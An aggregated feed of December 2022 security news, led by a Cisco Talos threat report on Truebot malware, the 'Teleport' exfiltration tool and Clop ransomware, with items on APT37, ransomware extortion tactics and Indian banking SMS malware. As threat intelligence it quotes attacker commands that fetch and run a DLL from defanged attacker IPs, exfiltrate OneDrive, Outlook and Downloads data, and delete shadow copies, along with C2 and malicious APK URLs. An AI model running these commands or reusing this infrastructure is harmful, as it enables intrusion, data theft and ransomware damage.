Security Posts

Infocon: green

SANS Internet Storm Center, InfoCON: green - Jue, 2022/12/08 - 23:47
Finding Gaps in Syslog - How to find when nothing happened
Categorías: Security Posts

Breaking the silence - Recent Truebot activity

Cisco Talos - Jue, 2022/12/08 - 21:38
Since August 2022, we have seen an increase in infections of Truebot (aka Silence.Downloader) malware. Truebot was first identified in 2017 and researchers have linked it to a threat actor called Silence Group that is responsible for several high-impact attacks on financial institutions in several countries around the world.There are claims by other researchers that this group is associated with the well-known threat actor TA505 (aka Evil Corp). In our research, we found that one of the new follow-on payloads that Truebot drops  is Grace (aka FlawedGrace and GraceWire) malware, which is attributed to TA505, further supporting these claims.Recently, the attackers have shifted from using malicious emails as their primary delivery method to other techniques. In August, we saw a small number of attacks that exploited a recent remote code execution vulnerability in Netwrix auditor. In October, a larger number of infections leveraged Raspberry Robin, a recent malware spread through USB drives, as a delivery vector. We believe with moderate confidence that during November, the attackers started using yet another way to distribute the malware.Post-compromise activity included data theft and the execution of Clop ransomware. While investigating one of these attacks, we found what seems to be a fully featured custom data exfiltration tool, which we are calling "Teleport," that was extensively used to steal information during the attack.So far, we have identified two different Truebot botnets. One is distributed worldwide, but with particular focus on Mexico, Pakistan, and Brazil. The second, more recent botnet appears to be focused on the U.S. While we don't have enough information to say that there is a specific focus on a sector, we noticed a number of compromised education sector organizations.New attack vectorsIn August, we noticed a small number of cases where Truebot was executed after the exploitation of a vulnerability in Netwrix Auditor, an IT asset management tool. We have high confidence that this was used as the entry vector on some of the compromised organizations. However, due to the reduced exposure of this product directly on the internet, it is unlikely that the attackers managed to compromise a high number of systems this way.Later, in the beginning of October, we started seeing a bigger uptick in Truebot infections, as it started being delivered by Raspberry Robin malware. This was also noticed by others, such as Microsoft, which wrote a blog post focused on the connections of Raspberry Robin to a larger ecosystem that included Truebot as one of the payloads. We believe with high confidence that these two vectors, mainly the Raspberry Robin delivery, led to the creation of a botnet of over 1,000 systems that is distributed worldwide, but with particular focus on Mexico, Brazil, and Pakistan, as seen in the following image.In November, we started seeing a new botnet being created.The following image shows the evolution of the infections on this botnet, based on openDNS telemetry:
While the the victims of the first botnet were mostly desktop systems not directly accessible from the internet, this second botnet is almost exclusively composed of Windows servers, directly connected to the internet, and exposing several Windows services such as SMB, RDP, and WinRM, but interestingly not Netwrix. This suggests that the attackers are using another distribution mechanism, although we have not yet identified this attack vector. This new botnet, with over 500 infections at the time of writing, seems to be focused on the U.S. (around 75% of infections). The following image shows the geographic infection distribution.Netwrix vulnerability (CVE-2022-31199) based deliveryBetween mid-August and September, we observed a small number of events in which suspicious commands were executed by a process named UAVRServer.exe. This process triggered the execution of bitsadmin to download and execute a binary. Further research revealed that this was an updated version of Truebot.The following is an example of one of these commands executed by the UAVRServer.exe process:C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\\ProgramData\\msruntime.dll&rundll32 /S c:\\ProgramData\\msruntime.dll,fff&del c:\\ProgramData\\msruntime.dll Although we were not able to collect the exploit code. Because multiple of these events occurred in the same timeframe on unrelated organizations, we believe with high confidence that these events are the result of the exploitation of a vulnerability in Netwrix Auditor (CVE-2022-31199) that was made public in July 2022 by Bishop Fox. Netwrix Auditor is an auditing tool that is used to assess the compliance with security and other best practices of IT assets and, according to the vulnerability disclosure document: “Netwrix Auditor is vulnerable to an insecure object deserialization issue that is caused by an unsecured .NET remoting service. An attacker can submit arbitrary objects to the application through this service to achieve remote code execution on Netwrix Auditor servers.”However, the vulnerable .NET remoting service would not usually be exposed to the internet, which may explain why we have seen only a small number of these attacks. We were able to confirm that at least one of the exploited systems was directly exposed to the internet with minimal or no firewall protection, and believe with high confidence that this exploit was the entry vector to an attack that included further post-compromise activity. According to the vulnerability disclosure document: “Since this service is typically executed with extensive privileges in an Active Directory environment, the attacker would likely be able to compromise the Active Directory domain.”This means that exploiting the vulnerability is effectively a fast track to compromising an organization domain-wide. It also means that this vulnerability is likely to be exploited within organizations that are already compromised to get administrative rights without raising any red flags. This vulnerability had been published only a few weeks before the attacks took place, and the number of systems exposed from the internet is expected to be quite small. This suggests that the attackers are not only on the lookout for new infection vectors, but are also able to quickly test them and incorporate them into their workflow.Raspberry Robin deliveryMore recently, since the beginning of October, we started seeing a higher number of systems infected with Truebot. This timeframe corresponded with new research that found many of these systems had previous Raspberry Robin infections that were delivering Truebot. This has been documented by Microsoft in a blog detailing how Raspberry Robin is part of a larger criminal ecosystem and has recently started delivering a few other malware families, including FakeUpdates, IcedID, Bumblebee, and Truebot. In our telemetry, we have observed multiple occurrences of Raspberry Robin delivering Truebot. The following image illustrates the attack sequence.The system was infected with Raspberry Robin through a USB device and, just a few minutes later, the malicious process downloaded the Truebot .dll file and executed it using rundll32.exe.In other cases, the Raspberry Robin infection that delivered Truebot had been present for some time.New Truebot versionTruebot is a downloader malware. As such, its main goal is to infect systems, collect information to help triage interesting targets, and deploy additional payloads. Once a system is infected, the malware collects information and sends it to the attacker’s command and control (C2). This version collects additional information: a screenshot, the computer name, the local network name, and active directory trust relations.This collected information hints at what the attackers are looking for. Active directory trust relations allow organizations to share users and resources across domains. Some use cases include extranets, connecting service providers or even mergers and acquisitions.This suggests the attackers are targeting large organizations, where these relations are more commonly deployed. Besides being a great indicator of a large organization, one example where this information could prove useful would be in finding a poorly protected network (for example, a company acquisition) that would provide an entry route to a more secure network.As a downloader tool, there are also some features that were not present in previously documented versions of the malware. Besides downloading and executing files, the malware is now able to load and execute additional modules and shellcodes in memory, making the payloads less likely to be detected.As illustrated in the image above, the “404NOTFOUND” command is used to emit no command. The “KLL | KLLSELF” commands causes the bot to uninstal, and, if the response contains an HTTP URL followed by a “| <action>” keyword, it performs one of the following actions:
  • |EXE – Download and run .exe file
  • |DLL – Download and run .dll file
  • |PS1 – Download and run .ps1 file
  • |BAT – Download and run .bat file
  • |DNM – Download and run .dll in memory
  • |SCH – Download and run shellcode
  • |S64 – Download and run 64 bit shellcode
The communication protocol changed slightly to include the new features. In summary, the HTTP communication includes new fields to include the network name and trust relations data and it is sent as a POST request with a parameter “q=<base64 encoded data>”. The remaining protocol details and encryption mechanism seem to remain unchanged, as has been previously documented.Post-compromise activityPost compromise, we found two payloads delivered by Truebot, Cobalt Strike and Grace malware. and what seems to be a custom data exfiltration tool that was used extensively by the attackers to steal information from the network.Grace and Cobalt StrikeOnce the systems have been compromised with Truebot, the attackers triage what seem to be interesting systems for further analysis and deploy additional malware to assist in that analysis.In this case, the payloads we found were 32- and 64-bit versions of Cobalt Strike reverse shell shellcode, Cobalt Strike delivered through PowerShell reflection, and a Grace shellcode loader containing a complex packer that contained Grace malware. This is a fairly complex packer, that was called “GraceWrapper” by Outpost24, that extensively documented it in a recent blog post, based on samples from an attack documented by Proofpoint in late 2021 where the new version of Grace was spotted.After unpacking, we were able to obtain a Grace binary, easily identifiable by a string in memory as well as the C++ class names left in the binary.Finding Grace as a payload is interesting, as it is known to be almost exclusively used by TA505, which further strengthens previous claims of a connection between Silence Group and TA505 made by Group-IB, which was based on source code comparison with FlawedAmmyy; and by Deutsche Telekom, by identifying different malware packed with TA505’s custom packer."Teleport" exfiltration toolAfter dropping one of the described payloads, the post-compromise attack flow is similar to that of other human-operated attacks. However, while investigating, we came across a set of commands to exfiltrate stolen data that made use of a tool that was unknown to us.After examining the binary, we found what seems to be a custom data exfiltration tool built in C++ and containing several features that make the process of data exfiltration easier and stealthier. We are calling it "Teleport" based on the communication encryption key hardcoded in the binary. Regarding the tool’s features, the following usage information provided by the tool itself is a great summary:Usage: tool.exe /RH:str /RP:int [/RS:int] [/P:str] [/D:str] [/DS:str] [/M:str] [/MX:str] [/SL:int] [/SU:int] [/CS:str] [/CU:str] [/MS:str] [/MU:str] [/E] [/K] [/Q] /RH:str -- Server host name to upload to /RP:int -- Server port number to upload to /RS:int -- Upload speed (in kilobytes per second) /P:str -- Directory prefix /D:str -- Directory to download from (recursive search) /DS:str -- Directory to download from (non-recursive search) /M:str -- File mask (default is *.*) /MX:str -- File mask to exclude /SL:int -- Lower size limit (in bytes) /SU:int -- Upper size limit (in bytes) /CS:str -- Creation date since (DDMMYYYY) /CU:str -- Creation date until (DDMMYYYY) /MS:str -- Modified date since (DDMMYYYY) /MU:str -- Modified date until (DDMMYYYY) /E -- Prescan mode (cache files before sending) /K -- Remove itself after execution /Q -- Quiet mode (don't show messages) Either /D or /DS must be specified. Flags /M, /MX, /D and /DS may be used more than once. Looking at the feature list we can see that, while not malicious per se, it has some features that are not common in remote copying tools that are useful to an attacker exfiltrating data during an attack:
  • Limiting the upload speed, which can make the transmission go undetected by tools that monitor for large data exfiltration. This can avoid making the network slow due to the file copying activity.
  • The communication is encrypted with a custom protocol to hide what information is being transmitted.
  • Limiting the file size, which can maximize the number of stolen files by avoiding lengthy copies of files that may not be interesting.
  • The ability to delete itself after use, which is ideal to keep it as unknown as possible.
While testing Teleport, we saw that the data was not in clear text. Further analysis revealed that it uses a custom communication protocol that encrypts data using AES and a hardcoded key. Reverse engineering revealed the following protocol structure that wraps the messages with an encryption layer.Most messages sent by the tool to its server start with a message-type identifier, followed by the size of the remaining payload, of which the first four bytes are a CRC32 check to ensure the integrity of the message, the next 16 bytes are a random initialization vector. and the remaining bytes are the encrypted payload content using the algorithm AES/CBC/Nopadding.The use of a custom data exfiltration tool is curious. Why would an attacker develop such a tool when there are so many different file copying solutions? There are a few possible reasons. For example, it makes the process of stealing interesting information from an unknown network of unknown systems faster. If we look at its use during the attack, we can see that the attackers are repeating on a large number of systems a few commands that the attackers know have good potential of gathering valuable information. For example:<redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive <redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook <redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads These commands effectively collect interesting files from the user’s OneDrive and Downloads folders and collect the user’s Outlook emails. Combining filtering by extension, file size, and file age allows the creation of commands that are repeatable and effective.Another reason includes stealth. It is not on the list of common file copying files, which provides limited stealthiness, but it also allows the limitation of bandwidth usage and communication encryption.The Clop attackAs previously mentioned, one of the possible outcomes of these attacks is double extortion using Clop ransomware. We had the opportunity to investigate one of these attacks in further detail. The following table summarizes the techniques used organized by the MITRE ATT&CK framework.The attack was in its essence similar to many other human-operated ransomware attacks. After compromise, the attackers dropped Cobalt Strike on several systems and started mapping the network and moving laterally to systems of interest. During the exploration and lateral movement phases, the attackers browsed key server and desktop file systems, connected to SQL databases, and collected data that was exfiltrated using the Teleport tool to an attacker-controlled server. Once sufficient data had been collected, the attackers created scheduled tasks on a large number of systems to simultaneously start executing the Clop ransomware and encrypt the highest possible volume of data.CoverageWays our customers can detect and block this threat are listed below.Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.The following Snort SIDs are applicable to this threat: 60844-60845, 60948-60949, 300329
IOCsNetwrix exploitation command examples:C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer IVjATqWXcLnw hxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll c:\\ProgramData\\IVjATqWXcLnw.dll&rundll32 /S c:\\ProgramData\\IVjATqWXcLnw.dll,fff C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer SysLog hxxp://179[.]60[.]150[.]34:80/download/file.ext c:\\ProgramData\\GUpdate.dll&rundll32 c:\\ProgramData\\GUpdate.dll,0&del c:\\ProgramData\\GUpdate.dll C:\\Windows\\System32\\cmd.exe /c bitsadmin /transfer MSVCP hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll c:\\ProgramData\\msruntime.dll&rundll32 /S c:\\ProgramData\\msruntime.dll,fff&del c:\\ProgramData\\msruntime.dll New Truebot versionSamples:092910024190a2521f21658be849c4ac9ae6fa4d5f2ecd44c9055cc353a26875 1ef8cdbd3773bd82e5be25d4ba61e5e59371c6331726842107c0f1eb7d4d1f49 2d50b03a92445ba53ae147d0b97c494858c86a56fe037c44bc0edabb902420f7 55d1480cd023b74f10692c689b56e7fd6cc8139fb6322762181daead55a62b9e 58b671915e239e9682d50a026e46db0d775624a61a56199f7fd576b0cef4564d 6210a9f5a5e1dc27e68ecd61c092d2667609e318a95b5dade3c28f5634a89727 68a86858b4638b43d63e8e2aaec15a9ebd8fc14d460dd74463db42e59c4c6f89 72813522a065e106ac10aa96e835c47aa9f34e981db20fa46a8f36c4543bb85d 7a64bc69b60e3cd3fd00d4424b411394465640f499e56563447fe70579ccdd00 7c79ec3f5c1a280ffdf19d0000b4bfe458a3b9380c152c1e130a89de3fe04b63 7e39dcd15307e7de862b9b42bf556f2836bf7916faab0604a052c82c19e306ca 97d0844ce9928e32b11706e06bf2c4426204d998cb39964dd3c3de6c5223fff0 bf3c7f0ba324c96c9a9bff6cf21650a4b78edbc0076c68a9a125ebcba0e523c9 c3743a8c944f5c9b17528418bf49b153b978946838f56e5fca0a3f6914bee887 c3b3640ddf53b26f4ebd4eedf929540edb452c413ca54d0d21cc405c7263f490 c6c4f690f0d15b96034b4258bdfaf797432a3ec4f73fbc920384d27903143cb0 b95a764820e918f42b664f3c9a96141e2d7d7d228da0edf151617fabdd9166cf 80b9c5ec798e7bbd71bbdfffab11653f36a7a30e51de3a72c5213eafe65965d9 Download URLS:hxxp://179[.]60[.]150[.]34:80/download/file.ext hxxp://179[.]60[.]150[.]53:80/download/msruntime.dll hxxp://179[.]60[.]150[.]53:80/download/GoogleUpdate.dll hxxp://tddshht[.]com/chkds.dll C2 addresses:hxxp://nefosferta.com/gate.php hxxp://185[.]55.[.]243[.]110/gate.php hxxp://gbpooolfhbrb[.]com/gate.php hxxp://88[.]214[.]27[.]100/gate.php hxxp://hiperfdhaus.com/gate.php hxxp://88[.]214[.]27[.]101/gate.php hxxp://jirostrogud[.]com/gate.php Data exfiltration toolSample:dd94c2fc46a6670b4600cf439b35dc81a401b09d2c2372139afe7b754d1d24d4 GraceSample (decrypted shellcode):27b6e71b4adeada41fb1e411a910872bfad999183d9d43ba6e63602e104d357b C2:45[.]227[.]253[.]102 Clop ransomwareFollowing are some of the command lines observed during this attack that may help detect ongoing malicious activity. There are, however, benign or dual-use tools and commands in this list so, they should not be used as the sole indicator of an ongoing attack.
adfind.exe -f &(objectcategory=computer) operatingsystem -csv adfind -f objectcategory=person samaccountname name displayname givenname department description title mail logoncount -csv adfind.exe -h <redacted> -f &(objectcategory=computer) operatingsystem samaccountname name displayname givenname department description title mail logoncount -csv sqlcmd -q select name from sys.databases sqlcmd -s <hostname> -q select name from sys.databases sqlcmd -s <hostname> -q set nocount on; select table_name from information_schema.tables where table_type = 'base table' -h -1 -w -e -d cct_db <redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\onedrive <redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /M:*.ost /M:*.pst /P:<remote path> /d:\\<local network host>\c$\users\<username>\appdata\local\microsoft\outlook <redacted>.exe /RH:<exfiltration server> /RP:443 /x:<password> /MX:thumbs.db /MX:*.exe /MX:*.mov /MX:*.dll /P:<remote path> /d:\\<local network host>\c$\users\<username>\downloads C:\Windows\System32\wbem\WMIC.exe shadowcopy where ID=<redacted> delete C:\windows\WinCDropQSysvolY.exe C:\windows\WinCDropQSysvolY.exe runrun schtasks.exe /create /tn OneDrvTest /tr C:\windows\SysZDropQLogonQ.exe /s <redacted> /sc onstart /ru system /f schtasks.exe /run /tn OneDrvTest /s <redacted>
Categorías: Security Posts

North Korean hackers once again exploit Internet Explorer’s leftover bits

ArsTechnica: Security Content - Jue, 2022/12/08 - 20:43
Enlarge / APT37, a group believed to be backed by the North Korean government, has found success exploiting the bits of Internet Explorer still present in various Windows-based apps. (credit: Aurich Lawson | Getty Images) Microsoft's Edge browser has replaced Internet Explorer in almost every regard, but some exceptions remain. One of those, deep inside Microsoft Word, was exploited by a North-Korean-backed group this fall, Google security researchers claim. It's not the first time the government-backed APT37 has utilized Internet Explorer's lingering presence, as Google's Threat Analysis Group (TAG) notes in a blog post. APT37 has had repeated success targeting South Korean journalists and activists, plus North Korean defectors, through a limited but still successful Internet Explorer pathway. The last exploit targeted those heading to Daily NK, a South Korean site dedicated to North Korean news. This one involved the Halloween crowd crush in Itaewon, which killed at least 151 people. A Microsoft Word .docx document, named as if it were timed and dated less than two days after the incident and labeled "accident response situation," started circulating. South Korean users began submitting the document to the Google-owned VirusTotal, where it was flagged with CVE-2017-0199, a long-known vulnerability in Word and WordPad.Read 3 remaining paragraphs | Comments
Categorías: Security Posts

New Ransom Payment Schemes Target Executives, Telemedicine

Krebs - Jue, 2022/12/08 - 20:25
Ransomware groups are constantly devising new methods for infecting victims and convincing them to pay up, but a couple of strategies tested recently seem especially devious. The first centers on targeting healthcare organizations that offer consultations over the Internet and sending them booby-trapped medical records for the “patient.” The other involves carefully editing email inboxes of public company executives to make it appear that some were involved in insider trading. Alex Holden is founder of Hold Security, a Milwaukee-based cybersecurity firm. Holden’s team gained visibility into discussions among members of two different ransom groups: CLOP (a.k.a. “Cl0p” a.k.a. “TA505“), and a newer ransom group known as Venus. Last month, the U.S. Department of Health and Human Services (HHS) warned that Venus ransomware attacks were targeting a number of U.S. healthcare organizations. First spotted in mid-August 2022, Venus is known for hacking into victims’ publicly-exposed Remote Desktop services to encrypt Windows devices. Holden said the internal discussions among the Venus group members indicate this gang has no problem gaining access to victim organizations. “The Venus group has problems getting paid,” Holden said. “They are targeting a lot of U.S. companies, but nobody wants to pay them.” Which might explain why their latest scheme centers on trying to frame executives at public companies for insider trading charges. Venus indicated it recently had success with a method that involves carefully editing one or more email inbox files at a victim firm — to insert messages discussing plans to trade large volumes of the company’s stock based on non-public information. “We imitate correspondence of the [CEO] with a certain insider who shares financial reports of his companies through which your victim allegedly trades in the stock market, which naturally is a criminal offense and — according to US federal laws [includes the possibility of up to] 20 years in prison,” one Venus member wrote to an underling. “You need to create this file and inject into the machine(s) like this so that metadata would say that they were created on his computer,” they continued. “One of my clients did it, I don’t know how. In addition to pst, you need to decompose several files into different places, so that metadata says the files are native from a certain date and time rather than created yesterday on an unknown machine.” Holden said it’s not easy to plant emails into an inbox, but it can be done with Microsoft Outlook .pst files, which the attackers may also have access to if they’d already compromised a victim network. “It’s not going to be forensically solid, but that’s not what they care about,” he said. “It still has the potential to be a huge scandal — at least for a while — when a victim is being threatened with the publication or release of these records.” The Venus ransom group’s extortion note. Image: Tripwire.com Holden said the CLOP ransomware gang has a different problem of late: Not enough victims. The intercepted CLOP communication seen by KrebsOnSecurity shows the group bragged about twice having success infiltrating new victims in the healthcare industry by sending them infected files disguised as ultrasound images or other medical documents for a patient seeking a remote consultation. The CLOP members said one tried-and-true method of infecting healthcare providers involved gathering healthcare insurance and payment data to use in submitting requests for a remote consultation on a patient who has cirrhosis of the liver. “Basically, they’re counting on doctors or nurses reviewing the patient’s chart and scans just before the appointment,” Holden said. “They initially discussed going in with cardiovascular issues, but decided cirrhosis or fibrosis of the liver would be more likely to be diagnosable remotely from existing test results and scans.” While CLOP as a money making collective is a fairly young organization, security experts say CLOP members hail from a group of Threat Actors (TA) known as “TA505,” which MITRE’s ATT&CK database says is a financially motivated cybercrime group that has been active since at least 2014. “This group is known for frequently changing malware and driving global trends in criminal malware distribution,” MITRE assessed. In April, 2021, KrebsOnSecurity detailed how CLOP helped pioneer another innovation aimed at pushing more victims into paying an extortion demand: Emailing the ransomware victim’s customers and partners directly and warning that their data would be leaked to the dark web unless they can convince the victim firm to pay up. Security firm Tripwire points out that the HHS advisory on Venus says multiple threat actor groups are likely distributing the Venus ransomware. Tripwire’s tips for all organizations on avoiding ransomware attacks include:
  • Making secure offsite backups.
  • Running up-to-date security solutions and ensuring that your computers are protected with the latest security patches against vulnerabilities.
  • Using hard-to-crack unique passwords to protect sensitive data and accounts, as well as enabling multi-factor authentication.
  • Encrypting sensitive data wherever possible.
  • Continuously educating and informing staff about the risks and methods used by cybercriminals to launch attacks and steal data.
While the above tips are important and useful, one critical area of ransomware preparedness overlooked by too many organizations is the need to develop — and then periodically rehearse — a plan for how everyone in the organization should respond in the event of a ransomware or data ransom incident. Drilling this breach response plan is key because it helps expose weaknesses in those plans that could be exploited by the intruders. As noted in last year’s story Don’t Wanna Pay Ransom Gangs? Test Your Backups, experts say the biggest reason ransomware targets and/or their insurance providers still pay when they already have reliable backups of their systems and data is that nobody at the victim organization bothered to test in advance how long this data restoration process might take. “Suddenly the victim notices they have a couple of petabytes of data to restore over the Internet, and they realize that even with their fast connections it’s going to take three months to download all these backup files,” said Fabian Wosar, chief technology officer at Emsisoft. “A lot of IT teams never actually make even a back-of-the-napkin calculation of how long it would take them to restore from a data rate perspective.”
Categorías: Security Posts

Credit card skimming – the long and winding road of supply chain failure

Naked Security Sophos - Jue, 2022/12/08 - 19:58
Don't keep calling home to a JavaScript server that closed its doors eight years ago!
Categorías: Security Posts

SMS scams trick Indian banking customers into installing malicious apps

Zscaler Research - Jue, 2022/12/08 - 18:30
Zscaler’s ThreatLabz researchers recently observed the rise of a sophisticated phishing campaign spreading via fake banking sites targeting big indian banks like HDFC, AXIS and SBI. The team will continue monitoring the emerging situation and will provide an update on any significant new developments. Previously, ThreatLabz researchers observed Indian banking customers being targeted with fake complaint forms from phishing sites spreading short message service (SMS) mobile text stealer malwares. In contrast, this new campaign leverages fake card update sites to spread Android-based phishing malware aimed at collecting banking information for financial fraud. Campaign 1: Targeting HDFC and Axis banks Threatlabz researchers observed domains serving links for fake bank related application downloads as shown in Fig.1 and Fig.2 below. Fig 1. Imitation application phishing site targeting HDFC bank customers Fig 2. Imitation application phishing site targeting Axis bank customers The two screenshots shown above show how these phishing scammers impersonate banking sites to gain customers' sensitive information by incentivizing them to fill out fake applications to redeem their earned card points for cash or a voucher. In most cases, these sites are being spread through SMS text messages to victims. Once a user clicks on the contained link, the victim is prompted to install an android-based phishing malware, designed to steal critical financial data. Fig 3. Phishing page for HDFC bank credit card application Upon opening the app, the user will see the fake page as presented in Fig 3 prompting them to enter sensitive information including card number, expiration date, cardholder name, phone number, DOB, etc., to redeem points for cash or vouchers, shown in the screenshot above. Once the victim submits their sensitive information into the fake form, the malware sends a copy to the command-and-control server (C2) shown in the screenshot below. ​​​​​​ Fig 4. In-App phishing page creation and C2 On the second run or completion of the prompted tasks, a timer screen is displayed to the user, revealed in the code shown in Fig 5 below. Fig 5. Final page show to user as second snap in Fig 3 Upon receiving all the victim’s sensitive form-fill information including card details, the threat actor is now capable of initiating fraudulent financial transactions. All they require to carry out the attack is a one-time password (OTP). To collect the OTP, victims are further prompted to provide SMS permission access to the malicious app at the time of installation. Once the user provides this access to SMS permissions, the malware is capable of exfiltrating received SMS text messages containing the OTP codes they need. To complete a transaction initiated using the user's card details, the application will intercept the OTP codes and forward them to the C2 server. Fig 6. Writing phishing data in shared preferences and MFA extraction This malware also employs a cloaking technique that prevents it from running a second time. It writes data in the modifiable shared preferences settings using first time install data written in the “time” object as its reference point to block users from seeing the card phishing page again. Fig 6. Cloaking to not load phishing page after first-time run Campaign 2: targeting SBI bank customers with KYC verification scam In other campaigns, ThreatLabz researchers observed adversaries sending SMS text messages prompting users to immediately update the ‘Know Your Customer’ (KYC) identity verification banking requirement or conduct another similarly urgent action to avoid account blocking or lock out. This false sense of urgency created by adversaries is very effective at convincing victims to perform the requested action including downloading apps to perform the task. In the cases observed in this article, all of these requests were fake and the attacks infected users with malicious apps and stole personal banking information. The screenshot below shows an attack where the user is prompted to download a malicious app to unlock their account. Fig 7. Smishing campaigns Unlike campaign 1 where applications were seen using in-app fake login pages, in this campaign SBI bank KYC verification scam, applications are relying on command servers to render the phishing pages. ThreatLabz researchers think that this is how the malware authors are able to create new campaigns so quickly, since only few changes such as updating C2 destinations are required to spin up a new campaign. The application starts with prompting users to login to a fake SBI bank web page and then to update the KYC verification, shown in Fig 8 below. Fig 8. Fake Login page redirect hosted on firebase Users are navigated through a series of web pages hosted on firebase upon entering banking credentials, mobile number, etc., shown in Fig 9. Fig 9. Login data phishing used to steal banking credentials The user is prompted to enter an OTP during each fake update step to make the application appear legitimate, shown in Fig 10 below, this tactic can also be used to steal the OTP and gain access. Fig 10. Prompting users for OTP The user is directed to a page and prompted to provide banking information, shown in Fig 11 below. Along with the bank details, the user is prompted to enter their Permanent Account Number (PAN) . Fig 11. Application prompts user to provide sensitive banking information Apart from collecting OTPs through phishing pages, malware developers have also implemented code routines to harvest OTPs from incoming SMS text messages and send them to a secondary C2 as well as a hard coded phone number, as shown below. Fig 12. Code to send incoming SMS data to C2 Fig 13. Testing of SMS data exfiltration to static number Fig 14. Traffic showing data upload to a remote server Zscaler sandbox is able to detect malware threat behavior and techniques. Fig 15. Zscaler sandbox report showing detection of malicious applications Zscaler advises users to not install any unknown applications sent through SMS text messages, especially if the messages identify with a financial institution or bank, this is a common practice used by threat actors to impose a false sense of urgency on users to act immediately without additional scrutiny. Indicators of Compromise (IOC) Campaign 1 IOCs Domains: hxxps[://]updateyourcard[.]in/HDFC_Credit_Card[.]apk hxxps[://]cardupdatation[.]in/ hxxps[://]cardupdate[.]in/ hxxp[://]pointincash[.]xyz/hdfc_version1.0[.]9[.]1[.]apk MD5s: df0b9265d07ffe523884f98613db8401 47eebf0d4ab713d53ec9f3b992777c18 a57c255e5e69d843a1c402df96ced959 ce8e95ef802d9943c2ff7abea1aa94da Campaign 2 IOCs Domains: hxxps[://]sheltered-dawn-11337[.]herokuapp[.]com/SBI-KYC[.]apk hxxps[://]sbi-kyc-update-immediately[.]web[.]app/SBI-KYC[.]apk hxxps[://]sbi-users-kyc-1[.]web[.]app/SBI-KYC[.]apk hxxps[://]sbi-user-kyc-app[.]web[.]app/SBI-KYC[.]apk hxxps[://]kyc-update-app[.]web[.]app/SBI-KYC[.]apk hxxps[://]sbi-kyc-apps-v-23[.]web[.]app/SBI-KYC[.]apk hxxps[://]point-dekho[.]xyz/save_sms[.]php hxxps[://]sbi-kyc-app[.]web[.]app/sbi-kyc[.]apk hxxps[://]sbi-kyc-points[.]web[.]app/sbi-kyc[.]apk hxxps[://]sbi-kyc-points[.]firebaseapp[.]com/sbi-kyc[.]apk hxxps[://]sbi-kyc-update-immediately[.]firebaseapp[.]com/sbi-kyc[.]apk hxxps[://]applicationkyc[.]pages[.]dev/SBI-KYC[.]apk hxxps[://]calm-fjord-69600[.]herokuapp[.]com/SBI-KYC[.]apk hxxps[://]calm-garden-42338[.]herokuapp[.]com/SBI-KYC[.]apk hxxps[://]please-visitnow-immediately[.]com/SBI-KYC[.]apk hxxps[://]publicationofindia[.]top/SBI-KYC[.]apk MD5s: 0076369748034430dd9345fecd0d130a f8509e2b72b3ba5916d80888b990b285 f0b6619e42722673e6599471a048edb1 436370a26633fb3a86f2ae2f09bcdb18 1aa0baa0c2fa54a89ecbfe71225726c6 331a9054e877a7210789315f7bcd2620
Categorías: Security Posts

TEST-2022YiR Livestream Post-TEST

Cisco Talos - Jue, 2022/12/08 - 18:03
Excerpt for livestream post
Categorías: Security Posts

Exposing a Compilation of Known Ransomware Group's Dark Web Onion Web Sites - An OSINT Analysis - Part Three

Dear blog readers,
I've decided to share with everyone part three of my "Exposing a Compilation of Known Ransomware Group's Dark Web Onion Web Sites - An OSINT Analysis" compilation of known ransomware themed Dark Web onion web sites.
